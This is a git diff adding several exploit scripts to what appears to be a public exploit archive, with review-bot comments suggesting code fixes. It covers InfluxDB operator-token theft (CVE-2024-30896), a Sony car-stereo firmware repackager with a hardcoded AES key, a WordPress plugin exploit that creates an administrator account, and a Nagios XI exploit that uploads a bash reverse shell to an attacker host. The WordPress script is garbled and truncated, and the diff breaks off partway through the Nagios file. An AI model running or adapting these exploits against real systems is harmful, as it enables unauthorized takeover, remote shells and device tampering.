diff --git a/exploits/multiple/remote/52142.py b/exploits/multiple/remote/52142.py
new file mode 100755
index 000000000..23572c7b1
--- /dev/null
+++ b/exploits/multiple/remote/52142.py
@@ -0,0 +1,221 @@ +# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw +# Date: 22/03/2024 +# Exploit Author: Andrea Pasin (Xenom0rph97) +# Researcher Homepage: https://xenom0rph97.github.io/xeno/ +# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896 +# Software Link: https://www.influxdata.com/products/influxdb/ +# Version: 2.x <=> 2.7.11 +# Tested on: InfluxDB OSS 2.x +# CVE: CVE-2024-30896 +# CVSS Base Score: 9.1 +# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + +# CVE-2024-30896 + +## Summary +A business logic flaw in influxdb allows users who own a valid allAccess +token to escalate their privileges at operator level by listing current +authorization tokens. + +## Scenario +Attacker might be a user which was gained access by an administrator via an +allAccess token only within their organization. +This user's permissions will allow full control over the organization but +will still prevent him to interact with other orgs. + +## Impact +This vulnerability would allow a user to obtain unrestricted access to the +influxdb instance. A similar condition might fully compromise +Confidentiality, Integrity and Availability of data owned by users of +different organizations. Additionally, since operator token has +administrative permissions, Availability and Integrity of the entire +influxdb instance might be compromised. + +## Prerequisites/Limitations +1. Attacker must have a valid allAccess token +2. allAccess token must have been created in the same Org where an operator +token resides (ex. same Org as Admin user) +3. 
Attacker must be able to interact with influxdb instance via CLI or APIs +(influxClient) + +## Steps to Reproduce +### Case 1: Exploitation via influxdb APIs: +*Python Version*: 3 +*Requirements*: `influxdb_client==1.41.0` +*Script usage* +``` +% python3 ./CVE-2024-30896.py -h +usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] +[-vv [VVERBOSE]] + +optional arguments: +-h, --help show this help message and exit +-t TOKEN, --token TOKEN +Custom or allAccess token to access influx DB +instance +-e ENDPOINTURL, --endpointUrl ENDPOINTURL +Endpoint Url of influxdb instance (ex. " +https://myInfluxdbInstance:8086/") +-v [VERBOSE], --verbose [VERBOSE] +Enable verbose logging - INFO +-vv [VVERBOSE], --vverbose [VVERBOSE] +Enable verbose logging - DEBUG +``` + +### Case 2: Exploitation via influx CLI +1. Execute: `influx auth ls -t | grep write:/orgs`. This +will list all current active operator tokens on the influxdb instance. + +*Example* +``` +# Using an allAccess token +influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED} + +0cc41c3b050e5000 U1OuqmFC{REDACTED} +admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations +write:orgs/87d0746948a3b3f5/authorizations +read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets +read:orgs/87d0746948a3b3f5/dashboards +write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 +read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources +read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks +read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs +read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 +read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables +read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers +read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets +read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels +read:orgs/87d0746948a3b3f5/views 
write:orgs/87d0746948a3b3f5/views +read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents +read:orgs/87d0746948a3b3f5/notificationRules +write:orgs/87d0746948a3b3f5/notificationRules +read:orgs/87d0746948a3b3f5/notificationEndpoints +write:orgs/87d0746948a3b3f5/notificationEndpoints +read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks +read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp +read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks +read:orgs/87d0746948a3b3f5/annotations +write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes +write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications +write:orgs/87d0746948a3b3f5/replications] + +# Listing all available tokens passing allAccess token and retrieving only +operator level tokens +influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs + +0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED} +admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations +read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs +write:/orgs read:/sources write:/sources read:/tasks write:/tasks +read:/telegrafs write:/telegrafs read:/users write:/users read:/variables +write:/variables read:/scrapers write:/scrapers read:/secrets +write:/secrets read:/labels write:/labels read:/views write:/views +read:/documents write:/documents read:/notificationRules +write:/notificationRules read:/notificationEndpoints +write:/notificationEndpoints read:/checks write:/checks read:/dbrp +write:/dbrp read:/notebooks write:/notebooks read:/annotations +write:/annotations read:/remotes write:/remotes read:/replications +write:/replications] + +influxdb_client==1.41.0 + +import influxdb_client +import argparse +import logging +import sys + +argParser = argparse.ArgumentParser() +argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance") +argParser.add_argument("-e", 
"--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")") +argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO") +argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG") + +args = argParser.parse_args() + +# Using user retrieved values or default (hardcoded) ones +all_access_token = "" +influx_endpoint_url = "" + +# Defining some colors +red = "\033[31m" +yellow = "\033[93m" +purple = "\33[1;95m" +green = "\033[0;92m" +cyan = "\033[96m" +bold ="\033[1m" +endc = "\033[39m" + +if args.vverbose == True: + logging.basicConfig(level=logging.DEBUG) +elif args.verbose == True: + logging.basicConfig(level=logging.INFO) + +logger = logging.getLogger() + +if args.token: + token = args.token +else: + logger.debug(f"{yellow}User did not set a token, using default one{endc}") + token = all_access_token + +if args.endpointUrl: + endpointUrl = args.endpointUrl +else: + logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}") + endpointUrl = influx_endpoint_url + +logger.info(f"{cyan}Connecting to influx DB instance{endc}") +# Connecting to influxdb instance +try: + conn = influxdb_client.InfluxDBClient( + url=endpointUrl, + token=token, + debug=False, + verify_ssl=True + ) + + # Verify InfluxDB connection + health = conn.ping() + if not health: + logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}") + print(f"{red}Quitting execution...{endc}") + sys.exit(1) + +except Exception as e: + logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}") + print(f"{red}Quitting execution...{endc}") + sys.exit(1) + +# Retrieving all current auths +logger.debug(f"{yellow}Retrieving all auth tokens{endc}") +print(f"{cyan}Enumerating current authorizations...{endc}") +try: + auths = 
conn.authorizations_api().find_authorizations() +except Exception as e: + logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}") + print(f"{red}Unable to retrieve authorizations. Quitting...{endc}") + sys.exit(1) +if not auths: + print(f"{cyan}No Authorization tokens found on the instance{endc}") + sys.exit(1) +print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n") +# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE +logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}") +print(f"{cyan}Enumerating all operator tokens:{endc}") +op_tokens = [] +# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access +try: + for auth in auths: + if auth.permissions: + for perm in auth.permissions: + if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations": + op_tokens.append(auth.token) +except Exception as e: + logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}") + print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}") + sys.exit(1) + +logger.info(f"{cyan}Printing all operator auth tokens{endc}") +print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}") +for op_t in op_tokens: + print(f"{green}{op_t}{endc}") \ No newline at end of file diff --git a/exploits/multiple/remote/52143.py b/exploits/multiple/remote/52143.py new file mode 100755 index 000000000..0997940b3 --- /dev/null +++ b/exploits/multiple/remote/52143.py 
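Review bot: The file is committed as `.py`, but everything from `## Summary` down to the stray `influxdb_client==1.41.0` line is uncommented markdown, so the interpreter stops with a SyntaxError before `argparse` ever runs; those lines need the same `#` prefix as the header block above them (or a companion `.txt`). The `-v`/`-vv` options use `type=bool` with `nargs='?'`, and `bool("false")` is `True`, so `-v false` still enables logging; `argParser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging - INFO")` is the conventional form. The "using default one" branches fall back to empty strings, so a missing `-t`/`-e` reaches `InfluxDBClient` with `url=""` and fails with an opaque client error instead of a usage message; `required=True` on both arguments, or an `argParser.error(...)` call, makes that precondition explicit. Minor: `perm.resource.org == None` should be `perm.resource.org is None`.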
@@ -0,0 +1,355 @@ +# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution +# Date: 11-Feb-2025 +# Exploit Author: lkushinada +# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500 +# Software Link: https://archive.org/details/xav-ax-5500-v-113 +# Version: 1.13 +# Tested on: Sony XAV-AX5500 +# CVE : CVE-2024-23922 + +# From NIST CVE Details: +# ==== +# This vulnerability allows physically present attackers to execute arbitrary code on affected +# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this +# vulnerability. The specific flaw exists within the handling of software updates. The issue +# results from the lack of proper validation of software update packages. An attacker can leverage +# this vulnerability to execute code in the context of the device. +# Was ZDI-CAN-22939 +# ==== + +# # Summary +# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography, +# obscurity of their package format, and a weird checksum method instead of any real firmware +# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation +# and allow a USB-based attacker to obtain RCE on the infotainment unit. + +# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's +# infotainment units and products which use a similar chipset or firmware package format. Tested +# to work on most firmware versions prior to v2.00. + +# # Threat Model +# An attacker with physical access to an automotive media unit can typically utilize other methods +# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post +# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar +# manner? if they are, how trivial is it to bypass? + +# # Disclaimer +# The information in this article is for educational purposes only. 
+# Tampering with an automotive system comes with risks which, if you don't understand, you should +# not be undertaking. +# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING +# FROM THE USE OF ANYTHING IN THIS DOCUMENT. + + +# # The Unit +# ## Processors +# - DAC +# - System Management Controller (SMC) +# - Applications Processor +# - Display Processor + +# Coming from a mobile and desktop computer environment, one may be use to thinking about +# the Applications Processor as the most powerful chip in the system in terms of processing power, +# size, power consumption, and system hierarchy. The first oddity of this platform is that the +# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the +# board. + +# The application processor does not appear to be the orchestrator of the components on the system. +# The SMC tkes which takes the role of watchdog, power state management, and input (think remote +# controls, steering wheel button presses) routing. +# For our purposes, it is the Applications processor we're interested in, as it is +# the system responsible for updating the unit via USB. + +# ## Interfaces +# We're going to be attacking the unit via USB, as it's the most readily exposed +# interface to owners and would-be attackers. +# Whilst the applications processor does have a UART interface, the most recent iterations of the +# unit do not expose any headers for debugging via UART, and the one active UART line found to be +# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no +# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's +# documentation suggests these are not enabled, but this could not be verified during testing. At the +# very least, JTAG was not found to be exposed on an accessible interface. 
+ +# ## Storage +# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This +# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details +# discussed in this report. + +# ## The Updater +# Updates are provided on Sony's support website. A ZIP package is provided with three files: +# - SHDS1132.up6 +# - SHMC1132.u88 +# - SHSO1132.fir +# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted. +# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and +# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest: + +# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| +# * +# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| + +# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| +# * +# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| + + +# ## SPI Flash +# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets: +# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................| +# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| +# * +# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R| +# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......| +# +# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.| +# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......| +# ... +# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| +# * +# 00778000 +# +# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI. +# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications. 
+ +# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives +# us a strong indication the encryption function is operating in an ECB-style configuration, +# giving us an avenue, even if we do not recover the key, to potentially make modifications +# to the firmware depending on how the checksum is being calculated. + +# ## Firmware +# The recovery application contains the decompression, decryption and checksum methods. +# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800, +# we start taking a look at the relevant functions by way of: +# - looking for known strings (KRSELCO) +# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail" +# - looking for things that look like encryption (loads of bitshifting math in one function) +# Of interest to us, there is: +# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10 +# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5 +# - 0x02d4ce - the AES decryption function +# - 0x040dd4 - strcmp (?) +# - 0x040aa4 - memcpy (?) +# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough +# padding zeros to get us to a 16 byte key + +# This gives us all the information we need, other than making some guesses as to the general package +# and header layout of the update package, to craft an update packager that allows arbitrary +# modification of the firmware. + +# # Proof of Concept +# The PoC below will take an existing USB firmware update, decrypt and extract the main binary, +# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage +# the update. 
+ +# ## Requirements +# - Unixish system +# - WinRar 2.0 (the version the Egyptians built the pyramids with) + +# ## Usage +# cve-2024-23922.py path_to_winrar source.fir output.fir + +import argparse +import sys +import os +import tempfile +import shutil +from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes +from cryptography.hazmat.backends import default_backend + +# Filenames as found in the .FIR +MAIN_BINARY_NAME="main_16.bin" +MAIN_RAR_NAME="main_16.rar" +DECRYPTED_FILE_NAME="decrypt.bin" +ENCRYPTED_FILE_NAME="encrypt.bin" + +# Offsets in the .FIR +HEADER_LENGTH=0x80 +RECOVERY_OFFSET=0x2800 +MAIN_OFFSET=0x80000 +CHECKSUM_OFFSET=0x800000-0x10 +CHECKSUM_SIZE=0x4 +RAR_LENGTH_OFFSET=0x4 +RAR_LENGTH_SIZE=0x4 + +# From 0x46490 in recovery_16.bin +ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00' + +def decrypt_file(input_file, output_file): + backend = default_backend() + cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend) + decryptor = cipher.decryptor() + + with open(input_file, 'rb') as file: + ciphertext = file.read() + + # Strip the unencrypted header + ciphertext = ciphertext[HEADER_LENGTH:] + + decrypted_data = decryptor.update(ciphertext) + decryptor.finalize() + + with open(output_file, 'wb') as file: + file.write(decrypted_data) + +def aes_encrypt_file(input_file, output_file): + backend = default_backend() + cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend) + encryptor = cipher.encryptor() + + with open(input_file, 'rb') as file: + plaintext = file.read() + + ciphertext = encryptor.update(plaintext) + encryptor.finalize() + + with open(output_file, 'wb') as file: + file.write(ciphertext) + +def get_sony_32(data): + csum = int() + for i in data: + csum = csum + i + return csum % 2147483648 # 2^31 + +def validate_args(winrar_path, source_file, destination_file): + # Check if the WinRAR executable exists and is a file + if not 
os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK): + print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.") + sys.exit(1) + + # Check if the source file exists + if not os.path.isfile(source_file): + print(f"[x] Error: The specified source file '{source_file}' does not exist.") + sys.exit(1) + + # Read 8 bytes from offset 0x10 in the source file + try: + with open(source_file, 'rb') as f: + f.seek(0x10) + signature = f.read(8) + if signature != b'KRSELECO': + print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.") + sys.exit(1) + except Exception as e: + print(f"[x] Error: Failed to read from '{source_file}': {e}") + sys.exit(1) + + # Check if the destination file already exists + if os.path.exists(destination_file): + print(f"[x] Error: The destination file '{destination_file}' already exists.") + sys.exit(1) + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier") + parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)") + parser.add_argument("source_file", help="Path to original .FIR file") + parser.add_argument("destination_file", help="Path to write the modified .FIR file to") + + args = parser.parse_args() + + validate_args(args.winrar_path, args.source_file, args.destination_file) + RAR_2_PATH = args.winrar_path + GOOD_FIRMWARE_FILE = args.source_file + DESTINATION_FIRMWARE_FILE = args.destination_file + + # make temporary directory + workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications") + + # copy the good firmware file into the temp directory + temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE)) + shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file) + + print("[+] Cutting the head off and decrypting the contents") + decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME) + decrypt_file(input_file=temp_fir_file, 
output_file=decrypted_file_path) + + print("[+] Dump out the rar file") + with open(decrypted_file_path, 'rb') as file: + # right before the rar file there is a 4 byte length header for the rar file. get that. + file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET) + original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big") + rar_file_bytes = file.read(original_rar_length) + + # now dump that out + rar_file_path=os.path.join(workdir, MAIN_RAR_NAME) + with open(rar_file_path, 'wb') as rarfile: + rarfile.write(rar_file_bytes) + + # check that the stat of the file matches what the header told us + dumped_rar_size = os.stat(rar_file_path).st_size + if dumped_rar_size != original_rar_length: + print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length) + + print("[+] Extracting the main binary from the rar file") + os.system("unrar x " + rar_file_path + " " + workdir) + + print("[!] Okay, I'm now going to wait until you have had a chance to make modifications") + print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME)) + input() + + print("[+] Continuing") + print("[+] Putting your main binary back into the rar file") + os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME) + + # we could fix this by writing some FFs + new_rar_size=os.stat(rar_file_path).st_size + if dumped_rar_size > os.stat(rar_file_path).st_size: + print("[!!] The rar size is smaller than the old one. This might cause a problem.") + print("[!!] Push any key to continue, ctrl+c to abort") + input() + + with open(decrypted_file_path, 'r+b') as file: + # right before the rar file there is a 4 byte length header for the rar file. 
go back there + file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET) + + # overwrite the old size with the new size + file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big")) + + print("[+] Deleting the old rar from the main container") + # delete the old rar from the main container by FFing it up + file.write(b'\xFF'*original_rar_length) + + # seek back to the start + file.seek(MAIN_OFFSET) + + print("[+] Loading the new rar back into the main container") + with open(rar_file_path, 'rb') as rarfile: + new_rarfile_bytes = rarfile.read() + file.write(new_rarfile_bytes) + + print("[+] Updating Checksum") + with open(decrypted_file_path, 'rb') as file: + contents = file.read() + + contents = contents[:-0x0010] + s32_sum = get_sony_32(contents) + + with open(decrypted_file_path, 'r+b') as file: + file.seek(CHECKSUM_OFFSET) + # read out the current checksum + old_checksum_bytes=file.read(CHECKSUM_SIZE) + print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes) + + # go back and update it with new checksum + print("new checksum:", s32_sum, hex(s32_sum)) + new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big") + file.seek(CHECKSUM_OFFSET) + file.write(new_checksum_bytes) + + print("[+] Encrypting the main container back up") + encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME) + aes_encrypt_file(decrypted_file_path, encrypted_file_path) + + print("[+] Reattaching the main container to the header and writing to dest") + with open(DESTINATION_FIRMWARE_FILE, 'wb') as file: + with open(temp_fir_file, 'rb') as firfile: + header = firfile.read(HEADER_LENGTH) + file.write(header) + with open(encrypted_file_path, 'rb') as encfile: + enc_contents = encfile.read() + file.write(enc_contents) + + print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.") + input() + shutil.rmtree(workdir) + +if __name__ == "__main__": + main() \ No newline at end of file 
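Review bot: Both external commands are run through `os.system` with paths concatenated into a shell string and their exit status discarded, so a failed `unrar` or `wine` invocation is silent and the script goes on to wait at `input()` for edits to a `main_16.bin` that was never extracted; `subprocess.run(["unrar", "x", rar_file_path, workdir], check=True)` (and the same shape for the `wine` call) avoids both the shell interpretation of the path and the silent failure. The prose at the top names the header marker `KRSELCO` while `validate_args` compares eight bytes against `b'KRSELECO'`; one of the two is a typo and they should be reconciled, though I cannot tell which from the hunk. The `tempfile.mkdtemp` directory is only removed on the success path, so any exception before the final `input()` leaves the decrypted working copy on disk; a `try`/`finally` around the body of `main` would make the cleanup deterministic. The return value of `finalize()` is dropped in both `decrypt_file` and `aes_encrypt_file`, which is fine for ECB on block-aligned input but deserves a one-line comment so the next reader does not "fix" it.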
diff --git a/exploits/multiple/webapps/52137.txt b/exploits/multiple/webapps/52137.txt
new file mode 100644
index 000000000..ce124982e
--- /dev/null
+++ b/exploits/multiple/webapps/52137.txt
@@ -0,0 +1,126 @@ +# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation +# Exploit Author: Al Baradi Joy +# Date: 2025-04-07 +# Vendor Homepage: https://wordpress.org/plugins/user-registration/ +# Software Link: +https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip +# Version: <= 4.1.1 +# Tested on: WordPress 6.4.3 +# CVSS: 9.8 (CRITICAL) +# CWE: CWE-269 +# References: +# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation +# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2025-2563 + +import re +import json +import requests +import random +import string +from urllib.parse import urljoin + +def banner(): +print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation") +print("[+] Made By Al Baradi Joy\n") + +def randstring(n=8): +return ''.join(random.choices(string.ascii_lowercase, k=n)) + +def get_regex(content, pattern, group=1, name=""): +match = re.search(pattern, content) +if not match: +raise ValueError(f"[-] Could not extract {name} (Pattern: +{pattern})") +return match.group(group) + +def exploit(target): +session = requests.Session() +username = randstring() +password = randstring() + "!@" +email = f"{username}@exploit.test" + +try: +print("[+] Getting registration page...") +r = session.get(urljoin(target, "/membership-registration/"), +timeout=10) +r.raise_for_status() +page = r.text + +nonce = get_regex(page, +r'"user_registration_form_data_save":"(.*?)"', name="nonce") +formid = get_regex(page, r"id='user-registration-form-([0-9]+)'", +name="formid") +memval = get_regex(page, +r'id="ur-membership-select-membership-([0-9]+)', name="membership value") +memname = get_regex(page, 
+r'data-field-id="membership_field_([0-9]+)"', name="membership field name") +front_nonce = get_regex(page, r'name="ur_frontend_form_nonce" +value="(.*?)"', name="frontend_nonce") +loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data += {"_nonce":"(.*?)"', name="localized_frontend_nonce") + +print("[+] Submitting registration form...") +form_data = [ +{"field_name": "user_login", "value": username, "field_type": +"text", "label": "Username"}, +{"field_name": "user_email", "value": email, "field_type": +"email", "label": "User Email"}, +{"field_name": "user_pass", "value": password, "field_type": +"password", "label": "User Password"}, +{"field_name": "user_confirm_password", "value": password, +"field_type": "password", "label": "Confirm Password"}, +{"value": memval, "field_type": "radio", "label": "membership", +"field_name": f"membership_field_{memname}"} +] + +payload = { +"action": "user_registration_user_form_submit", +"security": nonce, +"form_data": json.dumps(form_data), +"form_id": formid, +"registration_language": "en-US", +"ur_frontend_form_nonce": front_nonce, +"is_membership_active": memval, +"membership_type": memval +} + +r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), +data=payload, timeout=10) + +if '"success":true' not in r2.text: +print("[-] Registration form failed.") +return + +print("[+] Sending membership registration as administrator...") +member_payload = { +"action": "user_registration_membership_register_member", +"security": loc_nonce, +"members_data": json.dumps({ +"membership": "1", +"payment_method": "free", +"start_date": "2025-3-29", +"username": username, +"role": "administrator" +}) +} + +r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), +data=member_payload, timeout=10) + +if '"success":true' in r3.text: +print("[+] Exploit Successful!") +print(f"[+] Admin Username: {username}") +print(f"[+] Admin Password: {password}") +else: +print("[-] Membership escalation failed.") + +except 
Exception as e: +print(f"[-] Exploit failed: {str(e)}") + +if __name__ == "__main__": +banner() +target = input("Enter target WordPress site (e.g., http://example.com): +").strip().rstrip('/') +if not target.startswith("http"): +target = "http: \ No newline at end of file diff --git a/exploits/multiple/webapps/52138.txt b/exploits/multiple/webapps/52138.txt new file mode 100644 index 000000000..4258e1d70 --- /dev/null +++ b/exploits/multiple/webapps/52138.txt 
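Review bot: The script body has lost all of its indentation (every `def`, `try` and `if` body starts at column 0) and the file ends mid-literal at `target = "http:`, so the text as committed is not parseable Python and the `__main__` block is cut off; this reads like a mail-client wrapping and truncation artifact, and the submission should be replaced from the original file rather than edited in place. The `raise ValueError(f"[-] Could not extract {name} (Pattern: {pattern})")` and the two regex strings broken across lines are casualties of the same wrapping. Separately, the broad `except Exception` in `exploit` prints and discards the error, which hides `requests` timeouts and the HTTP errors raised by `raise_for_status()` behind one generic message; catching `requests.RequestException` and `ValueError` separately keeps the failure modes distinguishable.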
@@ -0,0 +1,90 @@ +# Exploit Title: Nagiosxi authenticated Remote Code Execution +# Date: 17/02/2024 +# Exploit Author: Calil Khalil +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Version: Nagios Xi 5.6.6 +# Tested on: Ubuntu +# CVE : CVE-2019-15949 + +# +# python3 exp.py -t https:/// -b // -u user -p 'password' -lh -lp -k (ignore cert) +# + +import argparse +import re +import requests +import urllib3 + +class Nagiosxi(): + def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl): + self.url = target + self.parameter = parameter + self.username = username + self.password = password + self.lhost = lhost + self.lport = lport + self.ignore_ssl = ignore_ssl + self.login() + + def upload(self, session): + print("Uploading Malicious Check Ping Plugin") + upload_url = self.url + self.parameter + "/admin/monitoringplugins.php" + upload_token = session.get(upload_url, verify=not self.ignore_ssl) + nsp = re.findall('var nsp_str = "(.*)";', upload_token.text) + print("Upload NSP Token: " + nsp[0]) + payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'" + file_data = { + "upload": "1", + "nsp": nsp[0], + "MAX_FILE_SIZE": "20000000" + } + file_upload = { + "uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"}) + } + session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl) + payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download" + session.get(payload_url, verify=not self.ignore_ssl) + + def login(self): + session = requests.Session() + login_url = self.url + self.parameter + "/login.php" + token = session.get(login_url, verify=not self.ignore_ssl) + nsp = re.findall('name="nsp" value="(.*)">', token.text) + print("Login NSP Token: " + nsp[0]) + post_data = { + "nsp": nsp[0], + "page": "auth", + "debug": "", + "pageopt": "login", + "redirect": "", + "username": self.username, + 
